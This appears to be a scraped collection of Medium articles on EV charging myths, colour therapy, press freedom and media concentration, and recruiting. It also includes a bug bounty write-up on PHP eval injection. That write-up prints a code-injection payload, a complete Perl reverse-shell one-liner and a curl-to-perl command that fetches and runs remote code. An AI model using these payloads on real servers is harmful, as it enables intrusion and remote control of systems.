5. If you step away to shop or dine out, be sure to return at the estimated time to remove your vehicle once it’s fully charged. (Check the company’s app to see progress to completion.) Note: Some companies give you a short grace period before they start adding late fees to your bill.
6. Cancel your reservation as far in advance as possible if you need to. You never know — someone else may need that particular port.
Tip: There are many blogs and social media accounts expressly devoted to providing EV owners with charging station information, including charging at private homes. Don’t hesitate to get in the loop! You never know when you might need it.
Myth #5: EV Charging takes too long
The best way to charge your electric vehicle is with a slower charge overnight. By contrast, fast charging too often can damage your battery.
But if you’re in a rush, fast charging may be your only option.
Fortunately, fast EV charging is widely available now and expanding rapidly all over America. But, remember to make sure your EV can handle it before connecting, because not all can.
Currently, for some EVs, you can get an 80% charge in about 30 minutes.
And price? Compared to the cost of a full tank of gas, you will most likely pay significantly less — up to $15,000, in fact — over the entire time you own your EV (15 years on average).
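For context, the quoted lifetime figure works out to a simple per-year amount:

```python
# Average yearly fuel-cost savings implied by the figures above.
lifetime_savings = 15000   # dollars, upper-bound figure quoted above
ownership_years = 15       # average ownership period quoted above
print(f"Roughly ${lifetime_savings // ownership_years} saved per year")
```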
Wrap Up on EV Charging Station Anxiety Myths
Driving an electric vehicle without worrying about charging station availability is becoming easier all the time.
Although the vast majority of EV drivers fill up at home overnight with plenty of juice for up to 250+ miles (depending on the vehicle), you could still find yourself, however unlikely, far from home in need of a charge.
At those times, it’s good to know that there are a growing number of charging station companies with locations all over the USA. A fast charge is literally just an app away on your phone.
With a wide network of EV charging station availability and a little planning, you’ll never look back after making the switch from a gas-powered to an electric car.
If you like this story, follow me and check out my free ‘How Energy Efficient Are You?’ quiz at EricTheEnergyBuff.com.
#ElectricCar #EV #ElectricVehicle
|
https://medium.com/@ericmelchor/ev-charging-availability-myths-busted-5141fae4183c
|
['Eric Melchor']
|
2020-12-16 10:56:41.726000+00:00
|
['Ev', 'Electric Car Charging', 'Electric Vehicles', 'Ev Charging', 'Electric Car']
|
Connect with Colour — Using Art as a Way of Knowing
|
Connect with Colour — Using Art as a Way of Knowing
The Therapeutic Value of Colour
Colour is so tightly woven into our world that we rarely stop to wonder what it is and how it works. Since the beginning of time, we have understood that sunlight is essential to life on our planet. Colour is light, and it is measured in wavelengths. The colours we choose to surround ourselves with in our daily lives are of great importance because we are in constant dialogue with, and response to, our environment. Colour is a big part of this conversation because it affects our entire organism through the energy and frequency produced by light. Once colour is seen, it is also felt through our bodily response.
It might be our eyes that “see” colour, but essentially it is our brains that process the information and send it back: the banana is yellow, for example. The central nervous system is the main control centre of our actions, and each stimulus received first affects the brain stem and then the nervous system. Colour is just one of these stimuli, and after it is seen, it is also felt. The eye performs two functions: light-sensitive cells known as cones in the retina at the back of the eye send electrochemical signals to the area of the brain known as the visual cortex, where the visual images we see are formed. Simultaneously, some retinal ganglion cells respond to light by sending signals to the hypothalamus, which, interestingly enough, plays no part in forming visual images. This is the non-visual aspect of ‘seeing’ that brings about the somatic response. The hypothalamus is a key player in the secretion of a number of hormones which control the body’s self-regulation. This shows there is a clear physiological connection through which colour and light can affect us. The discovery of the non-visual pathway to the hypothalamus suggests that the colour around us affects us both physiologically and psychologically.
Our bodies’ biological reactions to colour are very much the same; however, how our minds and spirits respond to colour differs from person to person. The biological response lasts only as long as we are exposed to the colour(s). This is where our mind and spirit come in: if we have an experience with colour that is impactful, if our senses have been stimulated, if we have been moved by our experience with colour, then once that colour has disappeared from our view, we can continue to benefit from the experience through memory and sensation. Colour has an effect on our mind, body and soul through our senses.
I have created a workshop that uses our relationship with colour for nourishment. In my workshop Connect with Colour, I take the participant on a journey to meet their “Intentional Colour”. We begin by setting an intention for the workshop; this gives the workshop a purpose and our inner knowing a directive. This journey to meet the colour(s) that speak to the intention set is a journey into the imagination through meditation and visualization.
The meaning of intentionality relates to our capacity to be self-conscious. Self-consciousness is a heightened state of self-awareness. It is also something that happens in our physical or mental minds. When creating an experience with colour, a level of intentionality already exists in the act of creating a space. So, if we are going to do something with intention, we are doing it purposefully. It is a conscious act: we become self-aware about what we want to achieve so that we can bring it into being. I ask participants what they would like to focus on, where they would like to see shift or change for themselves, and what would be a good outcome to the issue at hand. This becomes their intention for the workshop. It is important to be specific so you can focus on what you need in the moment and also on what is necessary for you right now. Setting an intention activates a part of our receptivity.
In my Connect with Colour workshop, I use exposure to colour through visualization and stimulation of the imagination first, then follow with traditional visual exposure to colour during art making. We allow the colours our intuition has presented us with to begin to nourish us. I feel confident we already hold the answers that we need and that colour has the ability to facilitate what wants to be heard through its vibration and frequency, subliminal communication if you will. Colour with all of its persuasive qualities, and effect on a cellular and psychic (mind and soul) level is truly a fascinating tool.
We have experienced the world visually, in colour, before language was developed. We have lived in a world of colour and vibration since the beginning of time. The vibration of colour and all that is around us is primary. Drawing helps us verbalize our visualization; we use art as a way of knowing. Art making allows us to access our subconscious giving us time to find the words after we have expressed ourselves. Artmaking gives us time to process and work through what is ‘on our minds’.
Connect with Colour is about us making time to co-create a space for a greater connection with ourselves. We co-create with colour, with art and with our inner knowing. I believe creativity is a muscle and the more we flex it and use it the stronger it will become. Why do we need creativity? Creativity is what helps us find creative solutions to what might be standing in our way. Using art as a way of knowing we can become artisans of our inner knowing. We have a wealth of resources that lie within: we only need to make space to hear them.
On my website you will find a promotional video and the self-guided workshop Connect with Colour. Please check it out, and may we all become artisans of our inner knowing! With kindness, Destiny Sophia @artofinnerknowing. www.destinysophia.com
|
https://medium.com/@dee-98039/connect-with-colour-using-art-as-a-way-of-knowing-e05b18e966ac
|
['Destiny Gagiano']
|
2020-12-15 13:23:37.821000+00:00
|
['Colour', 'Therapy', 'Art As A Way Of Knowing', 'Expression', 'Creativity']
|
Bugbounty PHP Code Injection Trick to Bypass Remote Code
|
Injected Code Success ^_^
Remote Code Execution
The expected backend code (my best guess: the input lands inside a single-quoted string that is then passed to eval()):

<?php
$input = $_REQUEST['local'];
eval("\$data = '" . $input . "';");
?>

If the parameter value were reflected inside double quotes it would execute directly, but inside single quotes it cannot, so we use a single quote to close the string and the dot (concatenation) operator to splice our call into the statement:

'.system("command").'

================================
After injection, the statement that eval() actually runs becomes:

<?php
$data = '' . system("command") . '';
?>
Getting Reverse Shell
I set up a listener on port 1234 on my VPS and tried to get a reverse shell.
I tried a bash one-liner and many other approaches, but they all failed [X] :(
I checked whether netcat or socat was installed on the server, but neither was [X]:
'.system("nc -v").'
No data was reflected, meaning the command did not run.
I checked for many other languages (Python, Ruby) and tools that can spawn a reverse shell, with no luck. But then I checked for Perl
and found Perl v5.20.
funny meme ^_^
We can get a reverse shell with this Perl one-liner:
perl -e 'use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
The request threw a syntax error because of the [&] sign.
The operation failed because in a query string [&] ends the current parameter and starts a new one, as in username=admin&password=pass.
I tried URL-encoding the sign, but that didn’t work either.
Next, I checked whether the curl tool was installed with this query:
'.system("curl -v").'
It was installed. Good. Let’s use it to bypass the restriction.
I uploaded the Perl code to Pastebin after removing the perl -e prefix and the surrounding [‘] quotes:
use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
Then I used curl to fetch that code and piped it into perl. The payload looked something like this (the Pastebin URL here is a placeholder for my actual raw paste URL):

'.system("curl -s https://pastebin.com/raw/XXXXXXXX | perl").'
Reverse Shell via Perl
BOOM!! It worked, and I got a reverse shell.
Prevent PHP code injection
- Filter or reject input containing shell metacharacters such as & ; && |
- Avoid using exec(), shell_exec(), system() or passthru()
- Avoid using strip_tags() for sanitisation
- Use a PHP security linter
- Utilise a SAST tool to identify code injection issues
- Never trust user-supplied data
Stay in touch
Linkedin | Github | Twitter |Facebook
|
https://medium.com/@4bdoz/rce-by-code-injection-perl-reverse-shell-a2e90181b10
|
[]
|
2021-09-06 08:02:01.700000+00:00
|
['Remote Code Execution', 'Hacking', 'Tips And Tricks', 'Tricks', 'Bug Bounty']
|
(UPDATE) Press freedom is declining worldwide
|
By Kent R. Kroeger (October 9, 2018)
This essay was originally published on October 5th. Since then, a Saudi journalist has disappeared in Turkey and a Bulgarian TV journalist has been killed.
According to sources speaking to The Washington Post, the Turkish government believes Saudi Arabian journalist Jamal Khashoggi was “killed in the Saudi Consulate in Istanbul last week by a Saudi team sent specifically for the murder.” The Post’s sources offered no evidence to support their account of events.
Khashoggi, missing since October 2nd, has been an open critic of the current Saudi regime, led by King Salman bin Abdulaziz Al Saud and his son, Crown Prince Mohammed bin Salman.
“The humble man I knew, who disappeared from the consulate in Istanbul, saw it as his duty to stand up for ordinary Saudis,” says fellow journalist and friend of Khashoggi, David Hearst.
“Again a courageous journalist falls in the fight for truth and against corruption,” Frans Timmermans, vice president of the European Commission, said Monday in Brussels.
In the other incident, 30-year-old TV journalist Viktoria Marinova was found dead on October 6th in a park in Ruse, Bulgaria.
Marinova was a director of TVN, a TV station in Ruse, Bulgaria and a TV presenter for two investigative news programs, one of which, Detector, recently featured two investigative journalists reporting on suspected fraud involving European Union funds.
Her final TV appearance was on Sept. 30.
Though Bulgarian authorities do not know yet if there is a connection between Marinova’s death and her work as a journalist, many European journalists are concerned as she is the third journalist to be killed in Europe in the past year. The other two murdered journalists were Jan Kuciak in Slovakia and Daphne Caruana Galizia in Malta.
These deaths add to a growing concern among European journalists that their profession is being targeted by power elites and criminal elements threatened by investigative journalism.
Original essay (published October 5, 2018):
In late August, an anti-immigration rally in Chemnitz, Germany provided vivid evidence of the far right’s growing popularity, the crowd’s anger directed mainly at Chancellor Angela Merkel and her 2015 decision to allow into the country more than 1 million refugees fleeing civil war and violence in the Middle East.
In Germany, the anti-immigration sentiment has been accompanied by a rise in violent attacks on journalists, according to Reporters Without Borders (RSF), which reports that “after reaching a peak of 39 attacks against journalists in 2015, this figure dropped to below 20 in 2016 and 2017.” In 2018, however, the number of such attacks is already higher than in 2016 or 2017.
RSF also reports this trend is growing worldwide.
According to RSF, 70 journalists, including citizen journalists and media assistants, have been killed so far in 2018, a toll on pace to exceed 90 deaths by year’s end. In addition, 316 journalists are currently imprisoned, including two Reuters journalists who were recently sentenced by a Myanmar judge to seven years in prison for breaching a law on state secrets.
In comparison, 74 journalists died worldwide in 2017, and 80 died in 2016.
But RSF does more than monitor violence against journalists. Since 2002, the Paris-based group has computed the World Press Freedom Index (WPFI) for over 180 countries. RSF describes the WPFI as follows:
WHAT DOES THE WORLD PRESS FREEDOM INDEX (WPFI) MEASURE?
The Index ranks 180 countries according to the level of freedom available to journalists. It is a snapshot of the media freedom situation based on an evaluation of pluralism, independence of the media, quality of legislative framework and safety of journalists in each country.
HOW THE WPFI IS COMPILED
The degree of freedom available to journalists in 180 countries is determined by pooling the responses of experts to a questionnaire devised by RSF. This qualitative analysis is combined with quantitative data on abuses and acts of violence against journalists during the period evaluated. The criteria used in the questionnaire are pluralism, media independence, media environment and self-censorship, legislative framework, transparency, and the quality of the infrastructure that supports the production of news and information.
RSF’s 2018 report on worldwide press freedom is one of its most pessimistic.
According to the WPFI, in 2018, press freedom in 74 percent of countries is either problematic, bad or very bad (see Figure 1). In 2002, the first year RSF calculated the WPFI, press freedom in only 45 percent of countries was categorized as problematic, bad, or very bad.
Figure 1: Distribution of World Press Freedom Index Scores (2018)
“Hostility towards the media from political leaders is no longer limited to authoritarian countries such as Turkey (ranked 157th out of 180 countries, down two ranks from 2017) and Egypt (161st), where “media-phobia” is now so pronounced that journalists are routinely accused of terrorism and all those who don’t offer loyalty are arbitrarily imprisoned,” reports RSF. “More and more democratically-elected leaders no longer see the media as part of democracy’s essential underpinning, but as an adversary to which they openly display their aversion.”
While citing President Donald Trump as one of the most visible culprits in verbally attacking journalists, RSF’s deepest concern is directed towards younger democracies.
“The line separating verbal violence from physical violence is dissolving. In the Philippines (ranked 133rd, down six from 2017), President Rodrigo Duterte not only constantly insults reporters but has also warned them that they “are not exempted from assassination,” says RSF. “In India (down two ranks to 138th), hate speech targeting journalists is shared and amplified on social networks, often by troll armies in Prime Minister Narendra Modi’s pay. In each of these countries, at least four journalists were gunned down in cold blood in the space of a year.”
Though physical attacks on U.S. journalists are still rare, the murder of five Maryland journalists last June being a sad exception, press freedom in the U.S. has nonetheless experienced an almost monotonic decline since 2002 (see Figures 2 and 3; high WPFI scores indicate lower levels of press freedom). Only a two-year interlude immediately before and after the 2008 presidential election saw the U.S. score significantly improve.
In 2002, the WPFI score for the U.S. was 4.75 (Rank 17th). Today, the U.S. score is 23.73 (Rank 45th). RSF’s singling out of President Trump as a causal factor in the U.S.’s press freedom decline is misplaced given that the U.S. WPFI score has been relatively flat over the past four years (see Figure 2).
Figure 2: World Press Freedom Index Score for the U.S. (2002–2018)
Figure 3: U.S. Rank on the WPFI (2002–2018)
And RSF is not the only monitoring organization that has found press freedom to be in decline worldwide.
“Only 14 percent of the world’s population live in societies in which there is honest coverage of civic affairs, journalists can work without fear of repression or attack, and state interference is minimal,” according to Freedom House’s Leon Willems and Arch Puddington. “Far too often today, the media present a regime account of developments in which the opposition case is ignored, distorted, or trivialized. And even in more pluralistic environments, news coverage is frequently polarized between competing factions, with no attempt at fairness or accuracy.”
The most troubling aspect of Freedom House’s finding is that even countries within the 14 percent (such as the U.S.) are witnessing an alarming rise in highly-polarized, non-objective journalism. And, in the case of the U.S., journalism is one of the least respected professions, according to the Gallup Poll.
Why has press freedom declined?
The decline in press freedom, worldwide and within the U.S., has many causal antecedents, according to RSF. In explaining the worldwide decline in press freedom in 2014–2015, RSF concluded, “Beset by wars, the growing threat from non-state operatives, violence during demonstrations and the economic crisis, media freedom is in retreat on all five continents.”
In the U.S. context, RSF’s hypotheses are plausible. Since 2002, the U.S. has engaged in two significant wars (Iraq, Afghanistan), both of which have produced mixed results (at best), has led or assisted military actions in Syria, Libya, and Yemen, has experienced a significant economic crisis (2008), and has seen the rise of two large domestic protest movements against an incumbent administration (Tea Party, #Resistance).
Declining media competition may be the biggest threat to journalism
RSF and other media researchers also cite media competition as a significant factor in explaining levels of press freedom. At one extreme is state-controlled media (China, North Korea) where there is no competition and press freedom is severely or completely curtailed. On the other end are pluralistic, democratic societies where media competition is not only present, but facilitated through government policy (Scandinavian countries, Germany, New Zealand, Austria).
For the U.S., the media regulatory environment fundamentally changed in 1996 with the U.S. Telecommunications Act.
“There is no doubt the 1996 U. S. Telecommunications Act fueled increasing consolidation across the communication industries. Designed to eliminate barriers to competition, the 1996 Act greatly liberalized ownership limitations for broadcasting and cable companies, allowing companies to acquire more competitors,” according to media economics researchers Alan Albarran and Bozena Mierzejewska. “For example, in the radio industry alone, some 75 different companies operating independently in 1995 were consolidated into just three companies by 2000.”
In 1983, 90 percent of US media was controlled by 50 companies. Today, according to Fortune magazine, 90 percent of U.S. media is controlled by just six companies.
Figure 4: Media concentration in the U.S.
How can media consolidation be bad given that the average American has access to over 100 TV channels, not to mention the thousands of internet websites? Shouldn’t the profit-motive impel major corporations to increase the number of information and entertainment choices in order to capture as much of the audience as possible?
That is the argument The New York Times’ Jim Rutenberg made in 2002 as the media consolidation trend was hitting its stride: media mergers create more choice, not less, according to Rutenberg.
Unfortunately, the evidence is not clear at all on that contention. In fact, it appears the opposite is true. Instead of getting real choice, consumers are given the illusion of choice.
“As massive media conglomerates persevere in their quest to monopolize the industry, it is important to realize what this means for alternative viewpoints in media and the already overwhelming effort to hush voices these media giants consider outside the mainstream,” according to Rick Manning, President of Americans for Limited Government. “Differing ideas and perspectives are what make up the very fabric of this great nation, and if we’re not careful with putting too much power in the hands of too few, this could all disappear.”
And when Manning says “alternative viewpoints” he is not talking about the Traditionalist Worker Party getting its own cable TV network. He’s talking about news organizations such as Bloomberg getting squeezed out of the news and information marketplace. Manning is particularly critical of Comcast-NBCU (which owns MSNBC and CNBC).
“Since the Comcast-NBCU merger in 2011, they have proven time and time again that they are not beneath stifling competition or other viewpoints that may not line up with their own. In fact, not only are they not beneath it, there is ample evidence that points to Comcast repeatedly doing so,” contends Manning. “Take Bloomberg TV, for example. Comcast’s conditions stipulated that they place Bloomberg programming next to MSNBC and CNBC, or other competing news channels such as Fox or CNN, in the channel lineup — yet for three years Bloomberg was blocked from the news channel neighborhood and slotted in an unfavorable spot, which negatively affected their viewership.”
With respect to journalism, another potential information-biasing process occurs when large media companies control journalists’ access to audiences through the allocation of broadcast airtime or print space [Whatever happened to Dylan Ratigan and Ed Schultz on MSNBC?]. And instead of providing in-depth information and analysis, today’s news outlets, particularly the cable news networks, bludgeon Americans with lively but mostly content-sparse debate. Why? Because it is profitable. The rule for cable news is this: find your audience, reinforce what they already believe, and for God’s sake don’t make them uncomfortable. Disney, Fox, and Comcast would be delinquent in their duties to shareholders if they did otherwise.
Noam Chomsky, as he often does, offers the most damning critique of cable news: “The smart way to keep people passive and obedient is to strictly limit the spectrum of acceptable opinion, but allow very lively debate within that spectrum.”
Large media conglomerates have enormous power through a variety of effective tools to influence, modify, and censor information disseminated through the major media outlets. Only the U.S. Government wields greater power in that respect.
Here is a specific example of how The Disney Company recently attempted (and thankfully failed) to deny the Los Angeles Times access to advance screenings which are critical to the paper’s ability to do its job.
Access to credible sources is the lifeblood of any journalist. A journalist without sources is called an unemployed journalist.
So why would Disney deny the LA Times access to their advance screenings?
Case Study: Disney Bans LA Times
This is a note the Los Angeles Times offered to its readers last November:
The annual Holiday Movie Sneaks section published by the Los Angeles Times typically includes features on movies from all major studios, reflecting the diversity of films Hollywood offers during the holidays, one of the busiest box-office periods of the year. This year, Walt Disney Co. studios declined to offer The Times advance screenings, citing what it called unfair coverage of its business ties with Anaheim. The Times will continue to review and cover Disney movies and programs when they are available to the public.
So why was the LA Times excluded from advance screenings of Disney films during the 2017 Christmas season?
LA Times writer Glenn Whipp explained on Twitter that The Disney Company was unhappy with the LA Times’ investigation into Disney’s questionable business ties in Anaheim, California, home of the company’s Disneyland theme park.
Apparently, the LA Times’ critical reporting on how The Disney Company ‘strong-armed’ Anaheim’s local government was not well-received at Disney headquarters, prompting the company to blacklist the LA Times from interviews and advance screenings of Disney films in late 2017.
However, days after Disney banned the LA Times, other critics condemned the Disney action and compelled the company to lift its screening ban of the LA Times. Nonetheless, Disney made its point clear to entertainment journalists: Don’t cross the Mouse.
Since their late-2017 kerfuffle, Disney and the LA Times are cooperating again, but the recent approval of the Disney/Fox merger should raise an alarm for journalists. With every new Disney acquisition, its control over the information and entertainment landscape grows. With their acquisition of Fox’s entertainment properties, Disney will add the Avatar, The X-Men and Planet of the Apes franchises to its portfolio. And for every entertainment journalist working today, the Disney/Fox merger just makes the likelihood of their pissing off Disney (and losing access to critical industry sources) a little more likely.
Where media control is concentrated, press freedom suffers
What evidence exists showing the negative effects of media consolidation on press freedom? The amount of published research demonstrating this connection is small, but growing (some recent examples can be found: here, here, and here).
Along with RSF and Freedom House’s empirical work on press freedom, Columbia University Economics Professor Eli Noam has pioneered some expansive work on quantifying levels of media concentration across the globe.
In his 2016 book, Who Owns the World’s Media?, Noam and his collaborative team provide a data-driven analysis of global media ownership trends and their drivers. Using 2009 data (or later), they calculate overall national concentration trends, the market share of individual companies in the overall national media sector, and the size and trends of transnational companies in overall global media.
Employing a variety of concentration measures — in particular, the Herfindahl-Hirschman Index (HHI) and the Per Capita Number of Voices for firms with at least 1% market share (PCNV), both commonly used measures of market concentration — Noam computes media concentration scores for 30 countries where sufficient market share data are available.
The HHI is generally computed as

HHI = \sum_{i=1}^{n} p_i^2

where p_i is the market share of firm i and n is the number of firms in that industry.
Within each country, Noam computes an HHI score for each media sector and creates a total HHI score using a weighted average across media sectors.
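The HHI and the weighted country-level score described above fit in a few lines of Python (a sketch: the function names are mine, not Noam's, and shares are expressed as fractions in [0, 1] rather than the 0-10,000 percentage scale some antitrust work uses):

```python
def hhi(shares):
    """Herfindahl-Hirschman Index: the sum of squared market shares.

    With fractional shares, a monopoly scores 1.0 and a perfectly
    fragmented market approaches 0.
    """
    return sum(p * p for p in shares)

def weighted_hhi(sector_hhis, weights):
    """Country-level score: weighted average of per-sector HHI values."""
    total = sum(weights)
    return sum(h * w for h, w in zip(sector_hhis, weights)) / total

# Four equal firms -> moderately concentrated market
print(hhi([0.25, 0.25, 0.25, 0.25]))   # 0.25
# One dominant firm -> highly concentrated market
print(hhi([0.70, 0.20, 0.10]))         # 0.54
```

Note how the squaring weights large firms disproportionately: the dominant 70% firm alone contributes 0.49 of the 0.54 total.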
The HHI is influenced by the relative size distribution of the media firms in each country and is not related to a country’s absolute market size, whereas the Per Capita Number of Voices (PCNV) is heavily influenced by a country’s population size. Hence, the U.S., China, India, Russia, and Brazil have very low PCNV scores (high media concentration). Also, for the graph below, RSF’s World Press Freedom Index was inverted (100 − WPFI) for ease of interpretation (i.e., high values of the inverted WPFI equal high levels of press freedom).
The Results
Figure 5 reveals a negative linear association between press freedom and media concentration (as measured by an additive index combining the HHI and PCNV scores computed by Noam).
While China is clearly an extreme outlier, pulling the relationship into a strong positive direction, its exclusion from the analysis does not change the significance of the relationship. The linear regression models shown in the Appendix — using these explanatory variables: HHI, PCNV, Media Concentration Index (HHI+PCNV) and an indicator variable for democracies — found all four variables to be significantly associated with press freedom. Overall, both linear models explained almost three-quarters of the variance in press freedom.
Figure 5: Relationship between Press Freedom & Media Concentration
Notice in Figure 5 the location of Egypt, India, Russia, Turkey, Mexico, and China. All six countries have experienced significant violence against journalists in the past decade, according to RSF, and are either ruled by autocratic regimes (China, Russia, Egypt) or are democracies under significant internal stress (Mexico, Turkey, India). Press freedom and autocracies are incompatible.
Even within the subset of democratic countries, there remains a significant negative relationship between press freedom and media concentration. In countries such as Switzerland, Ireland, Finland, Sweden, Belgium, and the Netherlands, where media pluralism is strong, press freedoms are among the highest in the world. Israel, though, is an interesting outlier (low media concentration / relatively low press freedom).
Europe addresses media pluralism as the U.S. continues to approve mega-media mergers
Much of the recent research on media pluralism and market concentration relates to Europe, with the most comprehensive research conducted by the Centre for Media Pluralism and Media Freedom (CMPF) at the European University Institute. CMPF, a European Union co-funded research center, publishes the Media Pluralism Monitor (MPM) to assess the risks to media pluralism in a given country.
In its 2016 MPM report, the CMPF concluded: “Amongst the 20 indicators of media pluralism, concentration of media ownership, especially horizontal, represents one of the highest risks for media pluralism and one of the greatest barriers to diversity of information and viewpoints represented in media content.”
The European Union is actively monitoring media concentration, even using Russian election meddling in the U.S. and Europe as one of the justifications for addressing the issue. In March 2017, the EU’s High Level Expert Group (HLEG) for online disinformation concluded that one way to counter disinformation is through safeguarding the diversity of the European news media. In May 2017, the European Parliament adopted HLEG’s recommendation to create an annual mechanism to monitor media concentration in all EU Member States.
And what has the U.S. done for the past two decades with respect to media concentration?
Despite a significant number of major media mergers since the 1996 Telecommunications Act, most recently the Disney-Fox merger which still needs antitrust approval from Europe before it can be executed, the U.S. has not been silent on media pluralism and the dangers of media consolidation.
In 1945, the U.S. Supreme Court ruled in AP v. United States, “[the First] Amendment rests on the assumption that the widest possible dissemination of information from diverse and antagonistic sources is essential to the welfare of the public, that a free press is a condition of a free society.” In its 8–0 ruling (Justice Robert Jackson did not participate in the ruling), the Court upheld media ownership regulations to ensure source diversity, arguing “freedom to publish is guaranteed by the Constitution, but freedom to combine to keep others from publishing is not.”
Officially, the FCC’s policy objectives are competition, localism and diversity. Thus, before media mergers can occur they need approval from the FCC to ensure competition, localism and diversity are not threatened by a proposed merger.
In 2003, the FCC relaxed its ownership rules by eliminating cross-media ownership regulations in media markets with eight or more television stations, and allowed newspaper/television/radio cross-ownership in media markets served by four to eight television stations.
To implement this new regulatory policy, the FCC developed a Diversity Index in 2002, which measured viewpoint diversity using a formula related to the Herfindahl-Hirschman Index (HHI), a metric U.S. antitrust authorities have used to assess market competitiveness (i.e., concentration). The FCC Diversity Index (FDI) used consumers’ average time spent with each medium to weight its importance. It then assigned equal “market shares” to each outlet within each medium and combined those “market shares” for commonly owned outlets.
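Read literally, the paragraph above implies a small algorithm: weight each medium by consumption time, split that weight equally among the medium's outlets, merge shares under common ownership, then square-and-sum as in the HHI. The sketch below is an inference from that description, not the FCC's actual formula, and the market data is invented:

```python
def fdi(outlets, medium_weights):
    """Hypothetical sketch of the FCC Diversity Index described above.

    outlets: dict mapping medium -> list of owner names (one per outlet).
    medium_weights: dict mapping medium -> share of consumers' time.
    Each outlet gets an equal slice of its medium's weight; slices held
    by a common owner are combined; the result is an HHI-style sum of
    squared owner shares.
    """
    owner_share = {}
    for medium, owners in outlets.items():
        per_outlet = medium_weights[medium] / len(owners)
        for owner in owners:
            owner_share[owner] = owner_share.get(owner, 0.0) + per_outlet
    return sum(s * s for s in owner_share.values())

# Toy market: owner "A" holds two of three TV stations and one newspaper
market = {"tv": ["A", "A", "B"], "newspaper": ["A", "C"]}
weights = {"tv": 0.6, "newspaper": 0.4}
print(round(fdi(market, weights), 4))   # 0.44
```

Cross-ownership is what moves this number: owner "A" ends up with a 0.6 combined share, which the squaring step penalizes heavily.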
The FDI was controversial at its onset with many consumer advocacy groups arguing that it failed to capture the real degree of media concentration occurring in the U.S.
During testimony before the FCC in 2003, Dr. Mark Cooper, Director of Research for the Consumer Federation of America, offered this assessment of the FDI:
“The decision to allow newspaper-TV cross ownership in the overwhelming majority of local media markets in America is based on a new analytic tool, the Diversity Index, that was pulled from thin air at the last moment without affording any opportunity for public comment. The Diversity Index played the central role in establishing the markets where the FCC would allow TV-Newspaper mergers without any review. It produces results that are absurd on their face.”
“The Commission arrives at its erroneous decision to raise the national cap on network ownership to 45 percent and to triple the number of markets in which multiple stations can be owned by a single entity because it incorrectly rejected source diversity as a goal of Communications Act. The Commission ignored the mountain of evidence in the record that the ownership and control of programming in the television market is concentrated and extensive evidence of a lack of source diversity across broadcast and non-broadcast, as well as national and local markets. Allowing dominant firms in the local and national markets to acquire direct control of more outlets will enable them to strengthen their grip on the programming market, which undermines diversity and localism.”
Twenty-two years ago, President Bill Clinton signed the Telecommunications Act of 1996, a sweeping piece of legislation that was “essentially bought and paid for by corporate media lobbies…and radically opened the floodgates on mergers,” according to the media watchdog, Fairness and Accuracy in Reporting (FAIR).
Understandably, PACs and lobbyists for the big media companies put their money behind Hillary Clinton in 2016 (about $50 million, not including internet-related PACs or individual contributions…and that does not include donations to the Clinton Foundation from media-related sources). But, as we’ve seen so far in the Trump administration, the media mergers have continued unabated and, if anything, Trump’s presence in the White House has lifted profits for all of the major media companies.
Why does this all matter?
The news media plays a critical role in informing the public about our democracy and, as we saw in the 2016 election, the mere possibility that malevolent forces might have manipulated information in that election is unsettling. Add in social media and other new media platforms and the potential for real mischief is substantial.
But it isn’t just foreign actors like Russia that we need to guard against. We need to look closely at the domestic forces that can censor and manipulate what information Americans receive.
“How can we have a real debate about media issues, when we depend on that very media to provide a platform for this debate?” asks Boston journalist Michael Corcoran. “It is no surprise, for instance, that the media largely ignored the impact of Citizens United after the Supreme Court decision helped media companies generate record profits due to a new mass of political ads.”
“Democracy suffers when almost all media in the nation is owned by massive conglomerates. In this reality, no issue the left cares about — the environment, criminal legal reform or health care — will get a fair shake in the national debate,” laments Corcoran.
Of course, it is not just the progressive left that suffers under the American media oligarchy — any viewpoint or perspective substantially deviant from the interests of the media oligarchs suffers. The agenda-driven journalism that defines most of what we watch and read today, effectively discharged from the strict requirements of objectivity and backed by the enormous resources of the major media companies, is becoming ever harder to counteract.
Conversely, the major media companies — along with the social media giants — are increasingly equipped to suffocate news and information that threatens their corporate interests.
If Comcast, News Corp., Viacom, Disney, CBS, and Time Warner collectively or informally decide a U.S.-backed invasion of Iran will help keep their corporate revenues growing, what independent news outlet or journalist is going to have the coverage and market share to challenge them?
Democracy Now, The Intercept, and The Empire Files are not enough to defend against the palpable threat the major media companies pose to American journalism and, by necessary extension, the American democracy.
K.R.K.
APPENDIX: LINEAR REGRESSION MODELS
Three-Variable Model
Dependent Variable: Press Freedom as measured by WPFI
Independent Variables: HHI, PCNV, Democracy Indicator
Two-Variable Model
Dependent Variable: Press Freedom as measured by WPFI
Independent Variables: Concentration Index (HHI+PCNV), Democracy Indicator
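The appendix reports the structure of two OLS models but not their coefficients, which are not reproduced here. The three-variable model can be sketched with plain NumPy on clearly synthetic data (every number below is made up for illustration; only the model form follows the appendix):

```python
import numpy as np

rng = np.random.default_rng(0)
n = 30  # the analysis covers 30 countries

# Synthetic stand-ins for the real covariates (illustration only)
hhi = rng.uniform(0.05, 0.9, n)      # media-sector HHI
pcnv = rng.uniform(0.0, 1.0, n)      # per-capita number of voices
democracy = rng.integers(0, 2, n)    # democracy indicator (0/1)

# Synthetic outcome built so freedom falls with concentration
# and rises in democracies, plus noise
press_freedom = 60 - 25 * hhi + 10 * pcnv + 15 * democracy \
    + rng.normal(0, 3, n)

# Three-variable model: press freedom ~ HHI + PCNV + democracy
X = np.column_stack([np.ones(n), hhi, pcnv, democracy])
beta, *_ = np.linalg.lstsq(X, press_freedom, rcond=None)
print(dict(zip(["intercept", "HHI", "PCNV", "democracy"],
               beta.round(2))))
```

On the fabricated data the fit recovers the expected signs: a negative HHI coefficient (concentration hurts press freedom) and a positive democracy coefficient, which is the qualitative pattern the essay's analysis reports.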
|
https://kentkroeger.medium.com/update-press-freedom-is-declining-worldwide-63e3f8d247fe
|
['Kent Kroeger']
|
2018-10-09 20:42:13.206000+00:00
|
['News', 'Politics', 'Media', 'Free Speech', 'Journalism']
|
⏅ The 4 Pillars of Recruiting
|
Recruiting is like a box of chocolate. You better know what you’re going to get!
Hi everyone!
Welcome to the TRY ANGLES weekly review where my job is to share with you new readings, methods and tools that I have found and tested.
